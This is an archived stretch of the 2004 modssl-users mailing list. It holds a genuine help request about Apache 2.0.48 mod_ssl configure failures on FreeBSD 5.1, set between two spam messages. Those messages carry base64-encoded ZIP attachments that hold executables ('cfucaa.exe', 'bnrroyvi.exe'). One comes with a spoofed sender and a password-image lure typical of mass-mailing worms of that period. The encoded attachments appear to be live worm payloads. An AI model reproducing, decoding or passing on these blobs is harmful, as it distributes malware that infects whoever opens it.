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
BQYAAAAAAQABADgAAAD+VAAAAAA=

----------kumowrixmndpcsuqlxqg--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 27 23:09:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4B2FEA897C; Sat, 27 Mar 2004 23:09:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by master.modssl.org (Postfix) with ESMTP id 38562A8943
	for ; Sat, 27 Mar 2004 23:09:25 +0100 (CET)
Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60])
	(authenticated bits=0)
	by mail.fpsn.net (8.12.11/8.12.11) with ESMTP id i2RM8FHr038578
	for ; Sat, 27 Mar 2004 15:08:17 -0700 (MST)
Message-ID: <4065FBC7.8050104@fpsn.net>
Date: Sat, 27 Mar 2004 15:10:15 -0700
From: Colin Faber 
Organization: FPSN.NET Development
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6b) Gecko/20031205 Thunderbird/0.4
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache 2.0 + SSL + FreeBSD 5.1
References: 
In-Reply-To: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Colin Faber 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Has anyone been able to successfully build Apache 2.0.48 --with-ssl and --enable-ssl?

It seems the stock SSL library with FreeBSD 5.1-RELEASE-p16 isn't up to snuff. Below is the section of the config.log related to mod_ssl.


configure:9764: checking whether to enable mod_ssl
configure:9800: result: checking dependencies
configure:9805: checking for SSL/TLS toolkit base
configure:9856: result: /usr
configure:9859: checking for SSL/TLS toolkit version
configure:9861: result: OpenSSL 0.9.7a-p1 Feb 19 2003
configure:9879: checking for SSL/TLS toolkit includes
configure:9897: result: /usr/include
configure:9900: checking for SSL/TLS toolkit libraries
configure:9915: result: /usr/lib
configure:10036: checking for SSL_set_state
configure:10073: gcc -o conftest  -g -O2  -D_REENTRANT -D_THREAD_SAFE   -L/usr/local/lib conftest.c -lssl -lcrypto >&5
/var/tmp//ccZ69MDl.o: In function `main':
/usr/local/src.local/httpd/httpd-2.0.48/configure:10063: undefined reference to `SSL_set_state'
configure:10076: $? = 1
configure: failed program was:
#line 10041 "configure"
#include "confdefs.h"
/* System header to define __stub macros and hopefully few prototypes,
    which can conflict with char SSL_set_state (); below.  */
#include 
/* Override any gcc2 internal prototype to avoid an error.  */
#ifdef __cplusplus
extern "C"
#endif
/* We use char because int might match the return type of a gcc2
   builtin and then its argument prototype would still apply.  */
char SSL_set_state ();
char (*f) ();

int
main ()
{
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS.  Some functions are actually named
    something starting with __ and the normal name is an alias.  */
#if defined (__stub_SSL_set_state) || defined (__stub___SSL_set_state)
choke me
#else
f = SSL_set_state;
#endif

  ;
  return 0;
}
configure:10092: result: no
configure:10106: checking for SSL_set_cert_store
configure:10143: gcc -o conftest  -g -O2  -D_REENTRANT -D_THREAD_SAFE   -L/usr/local/lib conftest.c -lssl -lcrypto >&5
/var/tmp//ccgL31OW.o: In function `main':
/usr/local/src.local/httpd/httpd-2.0.48/configure:10133: undefined reference to `SSL_set_cert_store'
configure:10146: $? = 1
configure: failed program was:
#line 10111 "configure"
#include "confdefs.h"
/* System header to define __stub macros and hopefully few prototypes,
    which can conflict with char SSL_set_cert_store (); below.  */
#include 
/* Override any gcc2 internal prototype to avoid an error.  */
#ifdef __cplusplus
extern "C"
#endif
/* We use char because int might match the return type of a gcc2
   builtin and then its argument prototype would still apply.  */
char SSL_set_cert_store ();
char (*f) ();

int
main ()
{
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS.  Some functions are actually named
    something starting with __ and the normal name is an alias.  */
#if defined (__stub_SSL_set_cert_store) || defined (__stub___SSL_set_cert_store)
choke me
#else
f = SSL_set_cert_store;
#endif

  ;
  return 0;
}
configure:10162: result: no

-- 
Colin Faber
FPSN.Net Development staff
email: cfaber@fpsn.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 28 14:49:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6DB5CA8941; Sun, 28 Mar 2004 14:49:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Baleine.com (m92.net81-64-169.noos.fr [81.64.169.92])
	by master.modssl.org (Postfix) with SMTP id 4BA1DA893A
	for ; Sun, 28 Mar 2004 14:49:51 +0200 (CEST)
Date: Sun, 28 Mar 2004 14:49:42 +0100
To: modssl-users@modssl.org
Subject: Protected message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------tjhikjidqehsmjlflaiq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------tjhikjidqehsmjlflaiq
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Your  file is  attached.





In order to read the attach you have  to  use the following password:  





----------tjhikjidqehsmjlflaiq
Content-Type: image/gif; name="uhefclnbwd.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="uhefclnbwd.gif"
Content-ID: 

R0lGODlhPAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAA8ABAAAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnFhQUpBF2wRue3WRIKwgkfwNDCKk5MBaQiJRRPjRnxBIAm0J+RdEkkCU
2oQs0ijE5kBqkbYFgbXSoEkkMwkKCSKQJE2m/6gFsaWUahCoRU8yDUKNYE6fKLcJ6fpPpraf
Qs6azDpQqBCqAyMJeTUwZ5CzAuWeUXRWbtOkbF26rFVQW5CM/9LObStSCOEjTF3SZftvEdO1
ShX9i7QV8MCliWfmm0o5NM0zhYW0MR0E9WaoHUHLLP2Po1Ci/yTNtMW18t23Al8J2ZbzbLaZ
kXCXlgv33za5kJovckyQ8yJ8Ay02p829u/fv4B8GAQQAOw==

----------tjhikjidqehsmjlflaiq
Content-Type: application/octet-stream; name="Details.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Details.zip"

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
